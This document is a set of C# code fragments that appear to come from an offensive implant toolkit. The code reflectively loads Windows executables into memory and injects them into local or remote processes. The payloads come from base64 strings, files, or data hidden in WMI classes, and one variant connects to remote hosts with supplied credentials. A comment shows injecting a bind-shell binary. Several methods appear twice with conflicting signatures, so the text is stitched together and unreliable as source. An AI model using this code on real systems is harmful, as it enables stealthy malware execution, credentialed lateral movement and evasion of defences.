public static string InjectPeString(Int32 processId, string peString, string parameters) { string output = ""; PELoader peLoader = new PELoader(System.Convert.FromBase64String(peString)); //byte[] peBytes = System.Convert.FromBase64String(peString); //PELoader peLoader = new PELoader(peBytes); InjectPE injectPE = new InjectPE(peLoader, parameters); output += injectPE.GetOutput(); return(output); }
public static void InjectPEWMIFS(String processId, String wmiClass, String fileName, String parameters) { using (PELoader peLoader = new PELoader()) { if (!peLoader.Execute(Misc.QueryWMIFS(wmiClass, fileName))) { Console.WriteLine("PELoader Failed"); return; } _InjectPE(processId, peLoader, parameters); } }
public static void InjectPEString(String processId, String peString, String parameters) { using (PELoader peLoader = new PELoader()) { if (!peLoader.Execute(Convert.FromBase64String(peString))) { Console.WriteLine("PELoader Failed"); return; } _InjectPE(processId, peLoader, parameters); } }
public static string InjectPeWMIFS(Int32 processId, string wmiClass, string fileName, string parameters) { string output = ""; ConnectionOptions options = new ConnectionOptions(); options.Impersonation = System.Management.ImpersonationLevel.Impersonate; ManagementScope scope = new ManagementScope("\\\\.\\root\\cimv2", options); scope.Connect(); ObjectQuery queryIndexCount = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'"); ManagementObjectSearcher searcherIndexCount = new ManagementObjectSearcher(scope, queryIndexCount); ManagementObjectCollection queryIndexCollection = searcherIndexCount.Get(); int indexCount = queryIndexCollection.Count; String EncodedText = ""; for (int i = 0; i < indexCount; i++) { ObjectQuery queryFilePart = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + i + "\'"); ManagementObjectSearcher searcherFilePart = new ManagementObjectSearcher(scope, queryFilePart); ManagementObjectCollection queryCollection = searcherFilePart.Get(); foreach (ManagementObject filePart in queryCollection) { EncodedText += filePart["FileStore"].ToString(); } } byte[] peBytes = System.Convert.FromBase64String(EncodedText); PELoader peLoader = new PELoader(peBytes); InjectPERemote injectPE = new InjectPERemote((UInt32)processId, peLoader, parameters); try { injectPE.execute(); } catch { output = "[-] Execution Failed\n"; } finally { output += injectPE.GetOutput(); } return(output); }
public static void InjectPEWMIFSRemote(String processId, String wmiClass, String system, String username, String password, String fileName, String parameters) { var options = new ConnectionOptions(); options.Username = username; options.Password = password; var scope = new ManagementScope("\\\\" + system + "\\root\\cimv2", options); scope.Connect(); var queryIndexCount = new ObjectQuery("SELECT Index FROM WMIFS WHERE FileName = \'" + fileName + "\'"); var searcherIndexCount = new ManagementObjectSearcher(scope, queryIndexCount); ManagementObjectCollection queryIndexCollection = searcherIndexCount.Get(); Int32 indexCount = queryIndexCollection.Count; String EncodedText = ""; for (Int32 i = 0; i < indexCount; i++) { var queryFilePart = new ObjectQuery("SELECT FileStore FROM WMIFS WHERE FileName = \'" + fileName + "\' AND Index = \'" + i + "\'"); var searcherFilePart = new ManagementObjectSearcher(scope, queryFilePart); ManagementObjectCollection queryCollection = searcherFilePart.Get(); foreach (ManagementObject filePart in queryCollection) { EncodedText += filePart["FileStore"].ToString(); } } Byte[] peBytes = Convert.FromBase64String(EncodedText); using (PELoader peLoader = new PELoader()) { if (!peLoader.Execute(peBytes)) { Console.WriteLine("PELoader Failed"); return; } _InjectPE(processId, peLoader, parameters); } }
public static string InjectPeFile(Int32 processId, string fileName, string parameters) { //Invoke-CimMethod -ClassName Win32_Implant -Name InjectPeFromFileRemote -Arguments @{processId=5648; fileName="C:\bind64.exe"; parameters=""} PELoader peLoader = new PELoader(fileName); InjectPERemote injectPE = injectPE = new InjectPERemote((UInt32)processId, peLoader, parameters); string output = ""; try { injectPE.execute(); } catch { output = "[-] Execution Failed\n"; } finally { output += injectPE.GetOutput(); } return(output); }
private static void _InjectPE(String processId, PELoader peLoader, String parameters) { Console.WriteLine("\n"); try { if (!Int32.TryParse(processId, out Int32 dwProcessId)) { var injectPE = new InjectPE(peLoader, parameters); } else { var injectPE = new InjectPERemote((UInt32)dwProcessId, peLoader, parameters); try { using (var tokens = new Tokens()) { injectPE.Execute(); } } catch (Exception ex) { Console.WriteLine("[-] {0}", ex.Message); } } } catch (FormatException ex) { Console.WriteLine("[-] Unable to Parse Process ID"); Console.WriteLine("[-] {0}", ex.Message); } catch (Exception ex) { Console.WriteLine("[-] Unhandled Exception Occured"); Console.WriteLine("[-] {0}", ex.Message); } }
internal InjectPE(PELoader peLoader, String parameters) { //////////////////////////////////////////////////////////////////////////////// IntPtr lpAddress = IntPtr.Zero; UInt32 dwSize = peLoader.sizeOfImage; IntPtr lpBaseAddress = kernel32.VirtualAlloc(lpAddress, dwSize, kernel32.MEM_COMMIT, Winnt.MEMORY_PROTECTION_CONSTANTS.PAGE_EXECUTE_READWRITE); Console.WriteLine("[+] Allocated {0} bytes at 0x{1}", peLoader.sizeOfImage.ToString("X4"), lpBaseAddress.ToString("X4")); //////////////////////////////////////////////////////////////////////////////// for (Int32 i = 0; i < peLoader.imageFileHeader.NumberOfSections; i++) { IntPtr lpBaseAddressSection = new IntPtr(lpBaseAddress.ToInt32() + peLoader.imageSectionHeaders[i].VirtualAddress); UInt32 dwSizeSection = peLoader.imageSectionHeaders[i].SizeOfRawData; IntPtr lpAllocatedAddress = kernel32.VirtualAlloc(lpBaseAddressSection, dwSizeSection, kernel32.MEM_COMMIT, Winnt.MEMORY_PROTECTION_CONSTANTS.PAGE_EXECUTE_READWRITE); Marshal.Copy(peLoader.imageBytes, (Int32)peLoader.imageSectionHeaders[i].PointerToRawData, lpAllocatedAddress, (Int32)peLoader.imageSectionHeaders[i].SizeOfRawData); Console.WriteLine("[+] Copied {0} to 0x{1}", peLoader.imageSectionHeaders[i].Name, lpAllocatedAddress.ToString("X4")); } //////////////////////////////////////////////////////////////////////////////// IntPtr relocationTable = new IntPtr(lpBaseAddress.ToInt32() + peLoader.baseRelocationTableAddress); Winnt._IMAGE_BASE_RELOCATION relocationEntry = (Winnt._IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(Winnt._IMAGE_BASE_RELOCATION)); Int32 sizeOfRelocationStruct = Marshal.SizeOf(typeof(Winnt._IMAGE_BASE_RELOCATION)); Int32 sizeofNextBlock = (Int32)relocationEntry.SizeOfBlock; IntPtr offset = relocationTable; //////////////////////////////////////////////////////////////////////////////// while (true) { Winnt._IMAGE_BASE_RELOCATION relocationNextEntry = new Winnt._IMAGE_BASE_RELOCATION(); IntPtr lpNextRelocationEntry = new IntPtr(relocationTable.ToInt32() + (Int32)sizeofNextBlock); relocationNextEntry = (Winnt._IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(lpNextRelocationEntry, typeof(Winnt._IMAGE_BASE_RELOCATION)); IntPtr destinationAddress = new IntPtr(lpBaseAddress.ToInt32() + (Int32)relocationEntry.VirtualAdress); //////////////////////////////////////////////////////////////////////////////// for (Int32 i = 0; i < (Int32)((relocationEntry.SizeOfBlock - sizeOfRelocationStruct) / 2); i++) { UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i)); UInt16 type = (UInt16)(value >> 12); UInt16 fixup = (UInt16)(value & 0xfff); switch (type) { case 0x0: break; case 0xA: if (peLoader.is64Bit) { IntPtr patchAddress = new IntPtr(destinationAddress.ToInt64() + (Int32)fixup); Int64 originalAddress = Marshal.ReadInt64(patchAddress); Int64 delta64 = (Int64)(lpBaseAddress.ToInt64() - (Int64)peLoader.imageOptionalHeader64.ImageBase); Marshal.WriteInt64(patchAddress, originalAddress + delta64); } else { IntPtr patchAddress = new IntPtr(destinationAddress.ToInt32() + (Int32)fixup); Int32 originalAddress = Marshal.ReadInt32(patchAddress); Int32 delta32 = (Int32)(lpBaseAddress.ToInt32() - (Int32)peLoader.imageOptionalHeader32.ImageBase); Marshal.WriteInt32(patchAddress, originalAddress + delta32); } break; } } offset = new IntPtr(relocationTable.ToInt32() + (int)sizeofNextBlock); sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock; relocationEntry = relocationNextEntry; //"The last entry is set to zero (NULL) to indicate the end of the table." - cool if (0 == relocationNextEntry.SizeOfBlock) { break; } } //////////////////////////////////////////////////////////////////////////////// //http://sandsprite.com/CodeStuff/Understanding_imports.html //////////////////////////////////////////////////////////////////////////////// Int32 sizeOfStruct = Marshal.SizeOf(typeof(_IMAGE_IMPORT_DIRECTORY)); Int32 multiplier = 0; while (true) { UInt32 dwImportTableAddressOffset = (UInt32)((sizeOfStruct * multiplier++) + peLoader.importTableAddress); IntPtr lpImportAddressTable = new IntPtr(lpBaseAddress.ToInt32() + dwImportTableAddressOffset); _IMAGE_IMPORT_DIRECTORY imageImportDirectory = (_IMAGE_IMPORT_DIRECTORY)Marshal.PtrToStructure(lpImportAddressTable, typeof(_IMAGE_IMPORT_DIRECTORY)); if (0 == imageImportDirectory.RvaImportAddressTable) { break; } //////////////////////////////////////////////////////////////////////////////// IntPtr dllNamePTR = new IntPtr(lpBaseAddress.ToInt32() + imageImportDirectory.RvaModuleName); string dllName = Marshal.PtrToStringAnsi(dllNamePTR); IntPtr hModule = kernel32.LoadLibrary(dllName); Console.WriteLine("[+] Loaded {0} at {1}", dllName, hModule.ToString("X4")); //////////////////////////////////////////////////////////////////////////////// IntPtr lpRvaImportAddressTable = new IntPtr(lpBaseAddress.ToInt32() + imageImportDirectory.RvaImportAddressTable); while (true) { Int32 dwRvaImportAddressTable = Marshal.ReadInt32(lpRvaImportAddressTable); if (0 == dwRvaImportAddressTable) { break; } IntPtr lpDllFunctionName = (new IntPtr(lpBaseAddress.ToInt32() + dwRvaImportAddressTable + 2)); string dllFunctionName = Marshal.PtrToStringAnsi(lpDllFunctionName); IntPtr functionAddress = kernel32.GetProcAddress(hModule, dllFunctionName); Marshal.WriteInt64(lpRvaImportAddressTable, (Int64)functionAddress); lpRvaImportAddressTable = new IntPtr(lpRvaImportAddressTable.ToInt32() + 8); } } //////////////////////////////////////////////////////////////////////////////// String parameter = ""; IntPtr lpThreadAttributes = IntPtr.Zero; UInt32 dwStackSize = 0; UInt32 dwStartAddress = (UInt32)(lpBaseAddress.ToInt64() + peLoader.addressOfEntryPoint); IntPtr lpStartAddress = new IntPtr(dwStartAddress); IntPtr lpParameter = new IntPtr();//Convert.ToInt32(parameter)); UInt32 dwCreationFlags = 0; UInt32 lpThreadId = 0; IntPtr hThread = kernel32.CreateThread(lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter, dwCreationFlags, ref lpThreadId); Console.WriteLine("[+] Created thread 0x{0}", hThread.ToString("X4")); //////////////////////////////////////////////////////////////////////////////// kernel32.WaitForSingleObject(hThread, 0xFFFFFFFF); }
public InjectPERemote(UInt32 processId, PELoader peLoaderNew, string parametersNew) : base(processId) { peLoader = peLoaderNew; parameters = parametersNew; }
internal InjectPERemote(UInt32 processId, PELoader peLoader, String parameters) : base(processId) { this.peLoader = peLoader; this.parameters = parameters; }